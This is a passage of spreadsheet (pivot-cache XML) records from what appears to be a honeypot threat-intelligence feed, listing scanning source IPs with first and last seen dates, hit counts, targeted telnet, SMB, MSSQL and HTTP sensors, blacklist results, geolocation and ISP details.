    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:f1ac"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3602"/>
    <x v="3602"/>
    <s v="125-228-180-175.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T06:34:57"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-02T06:34:57"/>
    <n v="377"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H25&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;59401&amp;&amp;23&amp;&amp;NA&amp;&amp;34809&amp;&amp;34826&amp;&amp;34845&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:b4af"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3603"/>
    <x v="3603"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T06:34:28"/>
    <d v="2025-02-26T16:44:14"/>
    <d v="2025-04-02T06:34:28"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:e9c6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3604"/>
    <x v="3604"/>
    <s v="NA&amp;&amp;125-229-239-144.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T05:58:43"/>
    <d v="2024-08-29T06:34:41"/>
    <d v="2025-04-02T05:58:43"/>
    <n v="575"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;143&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7de5:ef90"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3605"/>
    <x v="3605"/>
    <s v="NA&amp;&amp;177-223-39-134.linqtelecom.com.br"/>
    <x v="0"/>
    <d v="2025-04-02T05:53:01"/>
    <d v="2025-03-14T14:11:15"/>
    <d v="2025-04-02T05:53:01"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="445&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="GO"/>
    <s v="Goiás"/>
    <s v="Goiânia"/>
    <s v="Goiânia"/>
    <s v="3462377"/>
    <s v="NA"/>
    <s v="-16.6786"/>
    <s v="-49.2539"/>
    <s v="266539"/>
    <s v="LINQ TELECOMUNICAÇOES LTDA ME"/>
    <s v="LINQ TELECOMUNICAÇOES LTDA ME"/>
    <s v="business"/>
    <s v="Linq Telecomunicacoes"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_SMB:Incoming connection (177.223.39.134,61438)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,61504)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,53543)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,60341)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,59556)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,55438)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,55497)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,56206)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,34716)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,64205)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,64880)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,50060)}&amp;&amp;{Data_SMB:Incoming connection (177.223.39.134,50201)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2017-07-07 00:00:00"/>
    <s v="2033-07-07 00:00:00"/>
    <s v="2024-06-06 00:00:00"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="published"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b1df:2786"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3606"/>
    <x v="3606"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T05:48:01"/>
    <d v="2025-04-02T05:46:12"/>
    <d v="2025-04-02T05:48:01"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="1992-01-29"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9d2a:c1fd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3607"/>
    <x v="3607"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T05:45:05"/>
    <d v="2025-04-02T05:45:05"/>
    <d v="2025-04-02T05:45:05"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="12"/>
    <s v="Dnipropetrovsk"/>
    <s v="Kamianskyi Raion"/>
    <s v="Kamianske"/>
    <s v="709932"/>
    <s v="NA"/>
    <s v="48.5172"/>
    <s v="34.6062"/>
    <s v="15895"/>
    <s v="KSNET-AS"/>
    <s v="GTU network"/>
    <s v="consumer"/>
    <s v="Golden Telecom LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bca3:5e22"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3608"/>
    <x v="3608"/>
    <s v="220-133-185-18.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T05:42:11"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-02T05:42:11"/>
    <n v="511"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H6&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;53563&amp;&amp;23&amp;&amp;NA&amp;&amp;9100"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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dc85:b912"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3609"/>
    <x v="3609"/>
    <s v="114-32-64-98.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T05:39:08"/>
    <d v="2023-09-11T00:34:00"/>
    <d v="2025-04-02T05:39:08"/>
    <n v="483"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;23575&amp;&amp;9100&amp;&amp;80"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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7220:4062"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3610"/>
    <x v="3610"/>
    <s v="114-32-198-204.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T05:27:57"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-02T05:27:57"/>
    <n v="498"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_DNS_H39&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;13178&amp;&amp;50853&amp;&amp;57914&amp;&amp;57930&amp;&amp;80&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7220:c6cc"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3611"/>
    <x v="3611"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T05:23:54"/>
    <d v="2025-03-05T12:02:17"/>
    <d v="2025-04-02T05:23:54"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:a9ea"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3612"/>
    <x v="3612"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T05:21:31"/>
    <d v="2025-04-02T05:21:31"/>
    <d v="2025-04-02T05:21:31"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:8371"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3613"/>
    <x v="3613"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T05:07:25"/>
    <d v="2025-04-02T05:07:25"/>
    <d v="2025-04-02T05:07:25"/>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4:9224"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3614"/>
    <x v="3614"/>
    <s v="220-134-100-207.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T05:06:21"/>
    <d v="2023-11-28T05:05:12"/>
    <d v="2025-04-02T05:06:21"/>
    <n v="504"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;46056&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;3830"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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dc86:64cf"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3615"/>
    <x v="3615"/>
    <s v="NA&amp;&amp;125-229-164-48.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T05:02:27"/>
    <d v="2024-09-09T18:32:00"/>
    <d v="2025-04-02T05:02:27"/>
    <n v="255"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
